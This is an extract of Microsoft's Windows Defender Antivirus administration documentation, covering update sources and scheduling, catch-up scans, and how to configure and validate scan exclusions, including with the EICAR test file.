These events can be centrally aggregated using the Windows event collector. It is common practice for SIEMs to
have connectors for Windows events. This technique allows for correlation of all security events from the machine
in the SIEM.
You can also monitor malware events using the Malware Assessment solution in Log Analytics.
For monitoring or determining status with PowerShell, WMI, or Microsoft Azure, see the (Deployment,
management, and reporting options table).
Related topics
Troubleshoot Windows Defender Antivirus reporting
in Update Compliance
Applies to:
When you use Windows Analytics Update Compliance to obtain reporting into the protection status of machines or
endpoints in your network that are using Windows Defender Antivirus, you may encounter problems or issues.
Typically, the most common indicators of a problem are:
You only see a small number or subset of all the devices you were expecting to see
You do not see any devices at all
The reports and information you do see is outdated (older than a few days)
For common error codes and event IDs related to the Windows Defender Antivirus service that are not related to
Update Compliance, see Windows Defender Antivirus events.
There are three steps to troubleshooting these problems:
1. Confirm that you have met all pre-requisites
2. Check your connectivity to the Windows Defender cloud-based service
3. Submit support logs
IMPORTANT
It typically takes 3 days for devices to start appearing in Update Compliance.
Confirm pre-requisites
In order for devices to properly show up in Update Compliance, you have to meet certain pre-requisites for both
the Update Compliance service and for Windows Defender Antivirus:
Endpoints are using Windows Defender Antivirus as the sole antivirus protection app. Using any other antivirus
app will cause Windows Defender AV to disable itself and the endpoint will not be reported in Update
Compliance.
Cloud-delivered protection is enabled.
Endpoints can connect to the Windows Defender AV cloud
If the endpoint is running Windows 10 version 1607 or earlier, Windows 10 diagnostic data must be set to the
Enhanced level.
It has been 3 days since all requirements have been met
If the above pre-requisites have all been met, you may need to proceed to the next step to collect diagnostic
information and send it to us.
Collect diagnostic data for Update Compliance troubleshooting
Related topics
Manage Windows Defender Antivirus updates and
apply baselines
Applies to:
There are two types of updates related to keeping Windows Defender Antivirus up to date:
1. Protection updates
2. Product updates
You can also apply Windows security baselines to quickly bring your endpoints up to a uniform level of
protection.
Protection updates
Windows Defender Antivirus uses both cloud-delivered protection (also called the Microsoft Advanced
Protection Service or MAPS ) and periodically downloaded protection updates to provide protection. These
protection updates are also known as Security intelligence updates.
The cloud-delivered protection is always on and requires an active connection to the Internet to function, while
the protection updates generally occur once a day (although this can be configured). See the Utilize Microsoft
cloud-provided protection in Windows Defender Antivirus topic for more details about enabling and
configuring cloud-provided protection.
Product updates
Windows Defender Antivirus requires monthly updates (known as "engine updates" and "platform updates"),
and will receive major feature updates alongside Windows 10 releases.
You can manage the distribution of updates through Windows Server Update Service (WSUS ), with System
Center Configuration Manager, or in the normal manner that you deploy Microsoft and Windows updates to
endpoints in your network.
In this section
TOPIC DESCRIPTION
Manage how protection updates are downloaded and Protection updates can be delivered through a number of
applied sources.
Manage when protection updates should be downloaded You can schedule when protection updates should be
and applied downloaded.
Manage updates for endpoints that are out of date If an endpoint misses an update or scheduled scan, you can
force an update or scan at the next log on.
Manage event-based forced updates You can set protection updates to be downloaded at startup
or after certain cloud-delivered protection events.
TOPIC DESCRIPTION
Manage updates for mobile devices and virtual machines You can specify settings, such as whether updates should
(VMs) occur on battery power, that are especially useful for mobile
devices and virtual machines.
Manage the sources for Windows Defender
Antivirus protection updates
Applies to:
There are two components to managing protection updates - where the updates are downloaded from, and
when updates are downloaded and applied.
This topic describes where you can specify the updates should be downloaded from, also known as the fallback
order.
See Manage Windows Defender Antivirus updates and apply baselines topic for an overview on how updates
work, and how to configure other aspects of updates (such as scheduling updates).
There are five locations where you can specify where an endpoint should obtain updates. Typically, you would
configure endpoints to individually download the updates from a primary source, followed by the other sources
in order of priority based on your network configuration.
Updates will be obtained from the sources in the order you specify. If a source is not available, the next source in
the list will be used.
You can use the following sources:
Microsoft Update
Windows Server Update Service (WSUS )
A network file share
The Microsoft Malware Protection Center Security intelligence page (MMPC )
When updates are published, some logic will be applied to minimize the size of the update. In most cases, only
the "delta" (or the differences between the latest update and the update that is currently installed on the
endpoint) will be downloaded and applied. However, the size of the delta depends on:
How old the current update on the endpoint is
Which source you use
The older the updates on an endpoint, the larger the download. However, you must also consider frequency
versus size - a more frequent update schedule may result in more ad hoc network usage, while a less-frequent
schedule may result in larger file sizes.
Microsoft Update allows for rapid releases, which means it will download small deltas on a frequent basis. This
ensures the best protection, but may increase network bandwidth.
The WSUS, Configuration Manager, and MMPC sources will deliver less frequent updates. The size of the
updates may be slightly larger than the frequent release from Microsoft Update (as the delta, or differences
between the latest version and what is on the endpoint will be larger). This ensures consistent protection without
increasing ad hoc network usage (although the amount of data may be the same or increased as the updates will
be fewer, but may be slightly larger).
IMPORTANT
If you have set MMPC as a fallback source after WSUS or Microsoft Update, updates will only be downloaded from MMPC
when the current update is considered to be out-of-date (by default, this is 2 consecutive days of not being able to apply
updates from the WSUS or Microsoft Update services). You can, however, set the number of days before protection is
reported as out-of-date.
Each source has typical scenarios that depend on how your network is configured, in addition to how often they
publish updates, as described in the following table:
LOCATION SAMPLE SCENARIO
WSUS You are using WSUS to manage updates for your network.
Microsoft Update You want your endpoints to connect directly to Microsoft

Update. This can be useful for endpoints that irregularly
connect to your enterprise network, or if you do not use
WSUS to manage your updates.
File share You have non-Internet-connected devices (such as VMs). You

can use your Internet-connected VM host to download the
updates to a network share, from which the VMs can obtain
the updates. See the VDI deployment guide for how file
shares can be used in virtual desktop infrastructure (VDI)
environments.
Configuration Manager You are using System Center Configuration Manager to

update your endpoints.
MMPC You need to download the latest protection updates because

of a recent infection or to help provision a strong, base
image for VDI deployment. This option should generally be
used only as a final fallback source, and not the primary
source. It will only be used if updates cannot be downloaded
from WSUS or Microsoft Update for a specified number of
days.
You can manage the order in which update sources are used with Group Policy, System Center Configuration
Manager, PowerShell cmdlets, and WMI.
IMPORTANT
If you set WSUS as a download location, you must approve the updates - regardless of what management tool you use to
specify the location. You can set up an automatic approval rule with WSUS, which may be useful as updates arrive at least
once a day. See To synchronize endpoint protection updates in standalone WSUS for more details.
The procedures in this article first describe how to set the order, and then how to set up the File share option if
you have enabled it.
Use Group Policy to manage the update location:
4. Expand the tree to Windows components > Windows Defender > Signature updates and configure
the following settings:
a. Double-click the Define the order of sources for downloading definition updates setting and
set the option to Enabled.
b. Enter the order of sources, separated by a single pipe, for example:
InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC , as shown in the following screenshot.
a. Click OK. This will set the order of protection update sources.
b. Double-click the Define file shares for downloading definition updates setting and set the
option to Enabled.
c. Enter the file share source. If you have multiple sources, enter each source in the order they should
be used, separated by a single pipe. Use standard UNC notation for denoting the path, for example:
\\host-name1\share-name\object-name|\\host-name2\share-name\object-name . If you do not enter any
paths then this source will be skipped when the VM downloads updates.
d. Click OK. This will set the order of file shares when that source is referenced in the Define the
order of sources... group policy setting.
Use Configuration Manager to manage the update location:
See Configure Security intelligence Updates for Endpoint Protection for details on configuring System Center
Use PowerShell cmdlets to manage the update location:
Use the following PowerShell cmdlets to set the update order.
Set-MpPreference -SignatureFallbackOrder {LOCATION|LOCATION|LOCATION|LOCATION}
Set-MpPreference -SignatureDefinitionUpdateFileSharesSouce {\\UNC SHARE PATH|\\UNC SHARE PATH}
See the following for more information:

Set-MpPreference -SignatureFallbackOrder
Set-MpPreference -SignatureDefinitionUpdateFileSharesSouce
Use PowerShell cmdlets to configure and run Windows Defender Antivirus
Defender cmdlets
Use Windows Management Instruction (WMI ) to manage the update location:
SignatureFallbackOrder
SignatureDefinitionUpdateFileSharesSouce

Use Mobile Device Management (MDM ) to manage the update location:
See Policy CSP - Defender/SignatureUpdateFallbackOrder for details on configuring MDM.
Related topics
Manage Windows Defender Antivirus updates and apply baselines
Manage updates for endpoints that are out of date
Manage event-based forced updates
Manage updates for mobile devices and VMs
Manage the schedule for when protection updates
should be downloaded and applied
Applies to:
Windows Defender Antivirus lets you determine when it should look for and download updates.
You can schedule updates for your endpoints by:
Specifying the day of the week to check for protection updates
Specifying the interval to check for protection updates
Specifying the time to check for protection updates
You can also randomize the times when each endpoint checks and downloads protection updates. See the
Schedule scans topic for more information.
Use Configuration Manager to schedule protection updates:
2. Go to the Definition updates section.
3. To check and download updates at a certain time:
a. Set Check for Endpoint Protection definitions at a specific interval... to 0.
b. Set Check for Endpoint Protection definitions daily at... to the time when updates should be
checked. 3
4. To check and download updates on a continual interval, Set Check for Endpoint Protection definitions
at a specific interval... to the number of hours that should occur between updates.
Use Group Policy to schedule protection updates:
IMPORTANT
By default, Windows Defender Antivirus will check for an update 15 minutes before the time of any scheduled scans.
Enabling these settings will override that default.
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates and
configure the following settings:
a. Double-click the Specify the interval to check for definition updates setting and set the option to
Enabled. Enter the number of hours between updates. Click OK.
b. Double-click the Specify the day of the week to check for definition updates setting and set the
option to Enabled. Enter the day of the week to check for updates. Click OK.
c. Double-click the Specify the time to check for definition updates setting and set the option to
Enabled. Enter the time when updates should be checked. The time is based on the local time of the
endpoint. Click OK.
Use PowerShell cmdlets to schedule protection updates:
Use the following cmdlets:
Set-MpPreference -SignatureScheduleDay
Set-MpPreference -SignatureScheduleTime
Set-MpPreference -SignatureUpdateInterval
Use Windows Management Instruction (WMI ) to schedule protection updates:
SignatureScheduleDay
SignatureScheduleTime
SignatureUpdateInterval

Related topics
Manage updates for mobile devices and virtual machines (VMs)
Manage Windows Defender Antivirus updates and
scans for endpoints that are out of date
Applies to:
Windows Defender Antivirus lets you define how long an endpoint can avoid an update or how many scans it
can miss before it is required to update and scan itself. This is especially useful in environments where devices
are not often connected to a corporate or external network, or devices that are not used on a daily basis.
For example, an employee that uses a particular PC is on break for three days and does not log on to their PC
during that time.
When the user returns to work and logs on to their PC, Windows Defender Antivirus will immediately check and
download the latest protection updates, and run a scan.
Set up catch-up protection updates for endpoints that haven't

updated for a while
If Windows Defender Antivirus did not download protection updates for a specified period, you can set it up to
automatically check and download the latest update at the next log on. This is useful if you have globally disabled
automatic update downloads on startup.
Use Configuration Manager to configure catch-up protection updates:
2. Go to the Definition updates section and configure the following settings:
a. Set Force a definition update if the client computer is offline for more than two consecutive
scheduled updates to Yes.
b. For the If Configuration Manager is used as a source for definition updates..., specify the hours
before which the protection updates delivered by Configuration Manager should be considered out-
of-date. This will cause the next update location to be used, based on the defined fallback source order.
3. Click OK.
Use Group Policy to enable and configure the catch-up update feature:
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates.
5. Double-click the Define the number of days after which a catch-up definition update is required
setting and set the option to Enabled. Enter the number of days after which you want Windows Defender
AV to check for and download the latest protection update.
6. Click OK.
Use PowerShell cmdlets to configure catch-up protection updates:
Set-MpPreference -SignatureUpdateCatchupInterval
Use Windows Management Instruction (WMI ) to configure catch-up protection updates:
SignatureUpdateCatchupInterval

Set the number of days before protection is reported as out-of-date

You can also specify the number of days after which Windows Defender Antivirus protection is considered old or
out-of-date. After the specified number of days, the client will report itself as out-of-date, and show an error to
the user of the PC. It may also cause Windows Defender Antivirus to attempt to download an update from other
sources (based on the defined fallback source order), such as when using MMPC as a secondary source after
setting WSUS or Microsoft Update as the first source.
Use Group Policy to specify the number of days before protection is considered out-of-date:
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates
and configure the following settings:
a. Double-click Define the number of days before spyware definitions are considered out of
date and set the option to Enabled. Enter the number of days after which you want Windows
Defender AV to consider spyware Security intelligence to be out-of-date.
b. Click OK.
c. Double-click Define the number of days before virus definitions are considered out of date
and set the option to Enabled. Enter the number of days after which you want Windows Defender
AV to consider virus Security intelligence to be out-of-date.
d. Click OK.
Set up catch-up scans for endpoints that have not been scanned for a
while
You can set the number of consecutive scheduled scans that can be missed before Windows Defender Antivirus
will force a scan.
The process for enabling this feature is:
1. Set up at least one scheduled scan (see the Schedule scans topic).
2. Enable the catch-up scan feature.
3. Define the number of scans that can be skipped before a catch-up scan occurs.
This feature can be enabled for both full and quick scans.
Use Group Policy to enable and configure the catch-up scan feature:
1. Ensure you have set up at least one scheduled scan.
5. Expand the tree to Windows components > Windows Defender Antivirus > Scan and configure the
following settings:
a. If you have set up scheduled quick scans, double-click the Turn on catch-up quick scan setting and
set the option to Enabled.
b. If you have set up scheduled full scans, double-click the Turn on catch-up full scan setting and set
the option to Enabled. Click OK.
c. Double-click the Define the number of days after which a catch-up scan is forced setting and set
the option to Enabled.
d. Enter the number of scans that can be missed before a scan will be automatically run when the user
next logs on to the PC. The type of scan that is run is determined by the Specify the scan type to use
for a scheduled scan (see the Schedule scans topic). Click OK.
NOTE
The Group Policy setting title refers to the number of days. The setting, however, is applied to the number of scans (not
days) before the catch-up scan will be run.
Use PowerShell cmdlets to configure catch-up scans:

Set-MpPreference -DisableCatchupFullScan
Set-MpPreference -DisableCatchupQuickScan
See Use PowerShell cmdlets to manage Windows Defender Antivirus and Defender cmdlets for more
Use Windows Management Instruction (WMI ) to configure catch-up scans:
DisableCatchupFullScan
DisableCatchupQuickScan

Use Configuration Manager to configure catch-up scans:
2. Go to the Scheduled scans section and Force a scan of the selected scan type if client computer is
offline... to Yes.
3. Click OK.
Related topics
Manage when protection updates should be downloaded and applied
Applies to:
Windows Defender Antivirus allows you to determine if updates should (or should not) occur after certain
events, such as at startup or after receiving specific reports from the cloud-delivered protection service.
Check for protection updates before running a scan

You can use System Center Configuration Manager, Group Policy, PowerShell cmdlets, and WMI to force
Windows Defender Antivirus to check and download protection updates before running a scheduled scan.
Use Configuration Manager to check for protection updates before running a scan:
2. Go to the Scheduled scans section and set Check for the latest definition updates before running a
scan to Yes.
3. Click OK.
4.Deploy the updated policy as usual.
Use Group Policy to check for protection updates before running a scan:
4. Expand the tree to Windows components > Windows Defender Antivirus > Scan.
5. Double-click Check for the latest virus and spyware definitions before running a scheduled scan
and set the option to Enabled.
6. Click OK.
Use PowerShell cmdlets to check for protection updates before running a scan:
Set-MpPreference -CheckForSignaturesBeforeRunningScan
Use Windows Management Instruction (WMI ) to check for protection updates before running a scan
CheckForSignaturesBeforeRunningScan

Check for protection updates on startup

You can use Group Policy to force Windows Defender Antivirus to check and download protection updates when
the machine is started.
5. Double-click Check for the latest virus and spyware definitions on startup and set the option to
Enabled.
6. Click OK.
You can also use Group Policy, PowerShell, or WMI to configure Windows Defender Antivirus to check for
updates at startup even when it is not running.
Use Group Policy to download updates when Windows Defender Antivirus is not present:
5. Double-click Initiate definition update on startup and set the option to Enabled.
6. Click OK.
Use PowerShell cmdlets to download updates when Windows Defender Antivirus is not present:
Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine
See Use PowerShell cmdlets to manage Windows Defender Antivirus and Defender cmdlets for more
Use Windows Management Instruction (WMI ) to download updates when Windows Defender
Antivirus is not present:
SignatureDisableUpdateOnStartupWithoutEngine
Allow ad hoc changes to protection based on cloud-delivered

protection
Windows Defender AV can make changes to its protection based on cloud-delivered protection. This can occur
outside of normal or scheduled protection updates.
If you have enabled cloud-delivered protection, Windows Defender AV will send files it is suspicious about to the
Windows Defender cloud. If the cloud service reports that the file is malicious, and the file is detected in a recent
protection update, you can use Group Policy to configure Windows Defender AV to automatically receive that
protection update. Other important protection updates can also be applied.
Use Group Policy to automatically download recent updates based on cloud-delivered protection:
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates
and configure the following:
a. Double-click Allow real-time definition updates based on reports to Microsoft MAPS and set
the option to Enabled. Click OK.
b. Double-click Allow notifications to disable definitions based reports to Microsoft MAPS and
set the option to Enabled. Click OK.
NOTE
"Allow notifications to disable definitions based reports" enables Microsoft MAPS to disable those definitions known to
cause false-positive reports. You must configure your computer to join Microsoft MAPS for this function to work.
Related topics
Manage updates for mobile devices and virtual
machines (VMs)
Applies to:
Mobile devices and VMs may require additional configuration to ensure performance is not impacted by updates.
There are two settings that are particularly useful for these devices:
Opt-in to Microsoft Update on mobile computers without a WSUS connection
Prevent Security intelligence updates when running on battery power
The following topics may also be useful in these situations:
Configuring scheduled and catch-up scans
Deployment guide for Windows Defender Antivirus in a virtual desktop infrastructure (VDI) environment
Opt-in to Microsoft Update on mobile computers without a WSUS

connection
You can use Microsoft Update to keep Security intelligence on mobile devices running Windows Defender
Antivirus up to date when they are not connected to the corporate network or don't otherwise have a WSUS
connection.
This means that protection updates can be delivered to devices (via Microsoft Update) even if you have set
WSUS to override Microsoft Update.
You can opt-in to Microsoft Update on the mobile device in one of the following ways:
1. Change the setting with Group Policy
2. Use a VBScript to create a script, then run it on each computer in your network.
3. Manually opt-in every computer on your network through the Settings menu.
Use Group Policy to opt-in to Microsoft Update:
5. Double-click the Allow definition updates from Microsoft Update setting and set the option to
Enabled. Click OK.
Use a VBScript to opt-in to Microsoft Update
1. Use the instructions in the MSDN article Opt-In to Microsoft Update to create the VBScript.
2. Run the VBScript you created on each computer in your network.
Manually opt-in to Microsoft Update
1. Open Windows Update in Update & security settings on the computer you want to opt-in.
2. Click Advanced options.
3. Select the checkbox for Give me updates for other Microsoft products when I update Windows.
Prevent Security intelligence updates when running on battery power

You can configure Windows Defender Antivirus to only download protection updates when the PC is connected
to a wired power source.
Use Group Policy to prevent definition updates on battery power:
4. Expand the tree to Windows components > Windows Defender Antivirus > Signature Updates and
configure the following setting:
a. Double-click the Allow definition updates when running on battery power setting and set the
option to Disabled.
b. Click OK. This will prevent protection updates from downloading when the PC is on battery power.
Related topics
Update and manage Windows Defender Antivirus in Windows 10
Customize, initiate, and review the results of Windows
Defender Antivirus scans and remediation
Applies to:
You can use Group Policy, PowerShell, and Windows Management Instrumentation (WMI) to configure Windows
Defender Antivirus scans.
In this section
TOPIC DESCRIPTION
Configure and validate file, folder, and process-opened file You can exclude files (including files modified by specified
exclusions in Windows Defender Antivirus scans processes) and folders from on-demand scans, scheduled
scans, and always-on real-time protection monitoring and
scanning
Configure Windows Defender Antivirus scanning options You can configure Windows Defender Antivirus to include
certain types of email storage files, back-up or reparse points,
and archived files (such as .zip files) in scans. You can also
enable network file scanning
Configure remediation for scans Configure what Windows Defender Antivirus should do when
it detects a threat, and how long quarantined files should be
retained in the quarantine folder
Configure scheduled scans Set up recurring (scheduled) scans, including when they should
run and whether they run as full or quick scans
Configure and run scans Run and configure on-demand scans using PowerShell,
Windows Management Instrumentation, or individually on
endpoints with the Windows Security app
Review scan results Review the results of scans using System Center Configuration
Manager, Microsoft Intune, or the Windows Security app
Configure and validate exclusions for Windows
Defender Antivirus scans
Applies to:
You can exclude certain files, folders, processes, and process-opened files from Windows Defender Antivirus scans.
The exclusions apply to scheduled scans, on-demand scans, and always-on real-time protection and monitoring.
Exclusions for process-opened files only apply to real-time protection.
Exclusions can be useful to avoid incorrect detections on files or software that are unique or customized to your
organization.
Windows Server 2016 also features automatic exclusions that are defined by the server roles you enable. See the
Windows Defender Antivirus exclusions on Windows Server 2016 topic for more information and a list of the
automatic exclusions.
WARNING
Defining exclusions lowers the protection offered by Windows Defender Antivirus. You should always evaluate the risks that
are associated with implementing exclusions, and you should only exclude files that you are confident are not malicious.
In this section
TOPIC DESCRIPTION
Configure and validate exclusions based on file name, Exclude files from Windows Defender Antivirus scans based on
extension, and folder location their file extension, file name, or location
Configure and validate exclusions for files opened by processes Exclude files from scans that have been opened by a specific
process
Configure Windows Defender Antivirus exclusions on Windows Windows Server 2016 includes automatic exclusions, based on
Server the defined server role. You can also add custom exclusions.
Configure and validate exclusions based on file extension and
folder location
Applies to:
IMPORTANT
Windows Defender Advanced Threat Protection does not adhere to Windows Defender Antivirus exclusion settings. This means that any Windows
Defender exclusions, no matter how you created them, are not applied by Windows Defender ATP.
You can exclude certain files from Windows Defender Antivirus scans by modifying exclusion lists.
Generally, you shouldn't need to apply exclusions. Windows Defender Antivirus includes a number of automatic exclusions based on
known operating system behaviors and typical management files, such as those used in enterprise management, database
management, and other enterprise scenarios and situations.
NOTE
Automatic exclusions apply only to Windows Server 2016 and above.
TIP
The default antimalware policy we deploy at Microsoft doesn't set any exclusions by default.
This topic describes how to configure exclusion lists for the following:
EXCLUSION EXAMPLES EXCLUSION LIST
Any file with a specific extension All files with the .test extension, anywhere on Extension exclusions
the machine
Any file under a specific folder All files under the c:\test\sample folder File and folder exclusions
A specific file in a specific folder The file c:\sample\sample.test only File and folder exclusions
A specific process The executable file c:\test\process.exe File and folder exclusions
This means the exclusion lists have the following characteristics:

Folder exclusions will apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point subfolders
must be excluded separately.
File extensions will apply to any file name with the defined extension if a path or folder is not defined.
IMPORTANT
The use of wildcards such as the asterisk (*) will alter how the exclusion rules are interpreted. See the Use wildcards in the file name and folder path
or extension exclusion lists section for important information about how wildcards work.
You cannot exclude mapped network drives. You must specify the actual network path.
Folders that are reparse points that are created after the Windows Defender Antivirus service starts and that have been added to the exclusion list
will not be included. You must restart the service (by restarting Windows) for new reparse points to be recognized as a valid exclusion target.
To exclude files opened by a specific process, see Configure and validate exclusions for files opened by processes.
The exclusions apply to scheduled scans, on-demand scans, and real-time protection.
IMPORTANT
Exclusion list changes made with Group Policy will show in the lists in the Windows Security app.
Changes made in the Windows Security app will not show in the Group Policy lists.
By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and WMI)
will be merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists will
take precedence in case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override managed deployment
settings.
Configure the list of exclusions based on folder name or file extension

Use Intune to configure file name, folder, or file extension exclusions:
See Configure device restriction settings in Microsoft Intune and Windows Defender Antivirus device restriction settings for Windows
10 in Intune for more details.
Use Configuration Manager to configure file name, folder, or file extension exclusions:
See How to create and deploy antimalware policies: Exclusion settings for details on configuring System Center Configuration
Manager (current branch).
Use Group Policy to configure folder or file extension exclusions:
NOTE
If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and subdirectories under
that folder are excluded.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object
you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration and click Administrative templates.
3. Expand the tree to Windows components > Windows Defender Antivirus > Exclusions.
4. Double-click the Path Exclusions setting and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each folder on its own line under the Value name column. If you are entering a file, ensure you enter a fully qualified
path to the file, including the drive letter, folder path, filename, and extension. Enter 0 in the Value column.
5. Click OK.
6. Double-click the Extension Exclusions setting and add the exclusions:
c. Enter each file extension on its own line under the Value name column. Enter 0 in the Value column.
7. Click OK.
Use PowerShell cmdlets to configure file name, folder, or file extension exclusions:
Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of
three cmdlets and the appropriate exclusion list parameter. The cmdlets are all in the Defender module.
The format for the cmdlets is:
<cmdlet> -<exclusion list> "<item>"
The following are allowed as the <cmdlet>:
CONFIGURATION ACTION POWERSHELL CMDLET
Create or overwrite the list Set-MpPreference
Add to the list Add-MpPreference
Remove item from the list Remove-MpPreference
The following are allowed as the <exclusion list>:
EXCLUSION TYPE POWERSHELL PARAMETER
All files with a specified file extension -ExclusionExtension
All files under a folder (including files in subdirectories), or a specific file -ExclusionPath
IMPORTANT
If you have created a list, either with Set-MpPreference or Add-MpPreference , using the Set-MpPreference cmdlet again will overwrite the
existing list.
For example, the following code snippet would cause Windows Defender AV scans to exclude any file with the .test file extension:
Add-MpPreference -ExclusionExtension ".test"
See Use PowerShell cmdlets to configure and run Windows Defender Antivirus and Defender cmdlets for more information on how to
use PowerShell with Windows Defender Antivirus.
Use Windows Management Instruction (WMI ) to configure file name, folder, or file extension exclusions:
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:
ExclusionExtension
ExclusionPath
The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference , Add-MpPreference , and
Remove-MpPreference .

Use the Windows Security app to configure file name, folder, or file extension exclusions:
See Add exclusions in the Windows Security app for instructions.
Use wildcards in the file name and folder path or extension exclusion lists
You can use the asterisk * , question mark ? , or environment variables (such as %ALLUSERSPROFILE% ) as wildcards when defining items
in the file name or folder path exclusion list. The way in which these wildcards are interpreted differs from their usual usage in other
apps and languages, so you should read this section to understand their specific limitations.
IMPORTANT
There are key limitations and usage scenarios for these wildcards:
Environment variable usage is limited to machine variables and those applicable to processes running as an NT AUTHORITY\SYSTEM account.
You cannot use a wildcard in place of a drive letter.
An asterisk * in a folder exclusion will stand in place for a single folder. Use multiple instances of \*\ to indicate multiple nested folders with
unspecified names.
The following table describes how the wildcards can be used and provides some examples.
WILDCARD USE IN FILE AND FILE USE IN FOLDER EXCLUSIONS EXAMPLE USE EXAMPLE MATCHES>
EX TENSION EXCLUSIONS
* (asterisk) Replaces any number of Replaces a single folder. 1. C:\MyData\*.txt 1.

characters. Use multiple * with folder 2. C:\somepath\*\Dat C:\MyData\notes.txt
Only applies to files in the slashes \ to indicate a 2. Any file in:
last folder defined in the multiple, nested folders. 3. C:\Serv\*\*\Backup
argument. After matching to the C:\somepath\Archives\Data
number of wilcarded and and its
named folders, all subfolders
subfolders will also be
included. C:\somepath\Authorized\Data
and its
subfolders
3. Any file in:
C:\Serv\Primary\Denied\Backup
and its
subfolders
C:\Serv\Secondary\Allowed\Backup
and its
subfolders
? (question mark) Replaces a single character. Replaces a single character 1. C:\MyData\my?.zip 1. C:\MyData\my1.zip
Only applies to files in the in a folder name. 2. C:\somepath\?\Dat 2. Any file in
last folder defined in the After matching to the a C:\somepath\P\Data
argument. number of wilcarded and 3. C:\somepath\test0 and its subfolders
named folders, all ?\Data 3. Any file in
subfolders will also be C:\somepath\test01\Data
included. and its subfolders
Environment variables The defined variable will be Same as file and extension 1. %ALLUSERSPROFI 1.
populated as a path when use. LE%\CustomLogFil C:\ProgramData\CustomLogFiles\Folder1
the exclusion is evaluated. es
IMPORTANT
If you mix a file exclusion argument with a folder exclusion argument, the rules will stop at the file argument match in the matched folder, and will
not look for file matches in any subfolders.
For example, you can exclude all files that start with "date" in the folders c:\data\final\marked and c:\data\review\marked by using the rule
argument c:\data\*\marked\date*.*.
This argument, however, will not match any files in subfolders under c:\data\final\marked or c:\data\review\marked.
Review the list of exclusions

You can retrieve the items in the exclusion list with Intune, System Center Configuration Manager, MpCmdRun, PowerShell, or the
IMPORTANT
If you use PowerShell, you can retrieve the list in two ways:
Retrieve the status of all Windows Defender Antivirus preferences. Each of the lists will be displayed on separate lines, but the items
within each list will be combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of
Add-MpPreference is written to a new line.
Validate the exclusion list by using MpCmdRun:

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:
MpCmdRun.exe -CheckExclusion -path <path>
NOTE
Checking exclusions with MpCmdRun requires Windows Defender Antivirus CAMP version 4.18.1812.3 (released in December 2018) or later.
Review the list of exclusions alongside all other Windows Defender Antivirus preferences by using PowerShell:
Get-MpPreference
In the following example, the items contained in the ExclusionExtension list are highlighted:
Retrieve a specific exclusions list by using PowerShell:
Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name
the variable:
$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionExtension
$WDAVprefs.ExclusionPath
In the following example, the list is split into new lines for each use of the Add-MpPreference cmdlet:
Validate exclusions lists with the EICAR test file

You can validate that your exclusion lists are working by using PowerShell with either the Invoke-WebRequest cmdlet or the .NET
WebClient class to download a test file.
In the following PowerShell snippet, replace test.txt with a file that conforms to your exclusion rules. For example, if you have excluded
the .testing extension, replace test.txt with test.testing. If you are testing a path, ensure you run the cmdlet within that path.
Invoke-WebRequest "http://www.eicar.org/download/eicar.com.txt" -OutFile "test.txt"
If Windows Defender Antivirus reports malware, then the rule is not working. If there is no report of malware, and the downloaded file
exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the EICAR
testfile website.
You can also use the following PowerShell code, which calls the .NET WebClient class to download the testfile - as with the
Invoke-WebRequest cmdlet; replace c:\test.txt with a file that conforms to the rule you are validating:
$client = new-object System.Net.WebClient

$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")
If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the
following PowerShell command:
[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')
You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
Related topics
Configure and validate exclusions in Windows Defender Antivirus scans
Configure and validate exclusions for files opened by processes
Customize, initiate, and review the results of Windows Defender Antivirus scans and remediation
Configure exclusions for files opened by processes
Applies to:
You can exclude files that have been opened by specific processes from Windows Defender Antivirus scans.
EXCLUSION EXAMPLE
Any file on the machine that is opened by any process with a Specifying "test.exe" would exclude files opened by:
specific file name c:\sample\test.exe
d:\internal\files\test.exe
Any file on the machine that is opened by any process under a Specifying "c:\test\sample\*" would exclude files opened by:
specific folder c:\test\sample\test.exe
c:\test\sample\test2.exe
c:\test\sample\utility.exe
Any file on the machine that is opened by a specific process in Specifying "c:\test\process.exe" would exclude files only opened
a specific folder by c:\test\process.exe
When you add a process to the process exclusion list, Windows Defender Antivirus won't scan files opened by that
process, no matter where the files are located. The process itself, however, will be scanned unless it has also been
added to the file exclusion list.
The exclusions only apply to always-on real-time protection and monitoring. They don't apply to scheduled or on-
demand scans.
Changes made with Group Policy to the exclusion lists will show in the lists in the Windows Security app.
However, changes made in the Windows Security app will not show in the Group Policy lists.
You can add, remove, and review the lists for exclusions in Group Policy, System Center Configuration Manager,
Microsoft Intune, and with the Windows Security app, and you can use wildcards to further customize the lists.
You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including reviewing your lists.
By default, local changes made to the lists (by users with administrator privileges; this includes changes made with
PowerShell and WMI) will be merged with the lists as defined (and deployed) by Group Policy, Configuration
Manager, or Intune. The Group Policy lists will take precedence in the case of conflicts.
You can configure how locally and globally defined exclusions lists are merged to allow local changes to override
managed deployment settings.
Configure the list of exclusions for files opened by specified processes

